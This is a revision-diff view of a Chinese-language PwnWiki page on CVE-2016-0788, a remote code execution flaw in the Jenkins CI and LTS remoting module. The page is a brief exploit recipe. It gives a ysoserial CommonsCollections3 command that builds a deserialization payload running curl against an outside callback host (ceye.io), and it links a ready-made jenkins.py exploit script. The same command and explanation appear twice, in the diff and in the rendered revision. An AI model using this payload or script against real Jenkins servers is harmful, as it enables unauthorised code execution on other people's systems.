Difference between revisions of "CVE-2016-0788 Jenkins CI和LTS 遠程代碼執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==簡介== CloudBeesJenkinsCI1.650之前版本和LTS1.642.2之前版本的remoting模塊中存在安全漏洞。遠程攻擊者可通過打開JRMP...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==簡介== | + | ==簡介== <!--T:1--> |
CloudBeesJenkinsCI1.650之前版本和LTS1.642.2之前版本的remoting模塊中存在安全漏洞。遠程攻擊者可通過打開JRMP監聽程序利用該漏洞執行任意代碼。 | CloudBeesJenkinsCI1.650之前版本和LTS1.642.2之前版本的remoting模塊中存在安全漏洞。遠程攻擊者可通過打開JRMP監聽程序利用該漏洞執行任意代碼。 | ||
| + | <!--T:2--> | ||
利用需要X-Jenkins-CLI2-Port對應的端口,如果Jenkins無法獲取CLI版本2的端口標頭<code>X-Jenkins-CLI2-Port</code>它會退回到版本1。 | 利用需要X-Jenkins-CLI2-Port對應的端口,如果Jenkins無法獲取CLI版本2的端口標頭<code>X-Jenkins-CLI2-Port</code>它會退回到版本1。 | ||
| − | ==利用ys生成二進製文件== | + | ==利用ys生成二進製文件== <!--T:3--> |
<pre> | <pre> | ||
java -jar ysoserial.jar CommonsCollections3 "curl http://r9rub4.ceye.io/" > payload.bin | java -jar ysoserial.jar CommonsCollections3 "curl http://r9rub4.ceye.io/" > payload.bin | ||
</pre> | </pre> | ||
| − | ==利用腳本== | + | ==利用腳本== <!--T:4--> |
https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py | https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py | ||
</translate> | </translate> | ||
Latest revision as of 15:51, 9 March 2021
簡介
CloudBeesJenkinsCI1.650之前版本和LTS1.642.2之前版本的remoting模塊中存在安全漏洞。遠程攻擊者可通過打開JRMP監聽程序利用該漏洞執行任意代碼。
利用需要X-Jenkins-CLI2-Port對應的端口,如果Jenkins無法獲取CLI版本2的端口標頭X-Jenkins-CLI2-Port它會退回到版本1。
利用ys生成二進製文件
java -jar ysoserial.jar CommonsCollections3 "curl http://r9rub4.ceye.io/" > payload.bin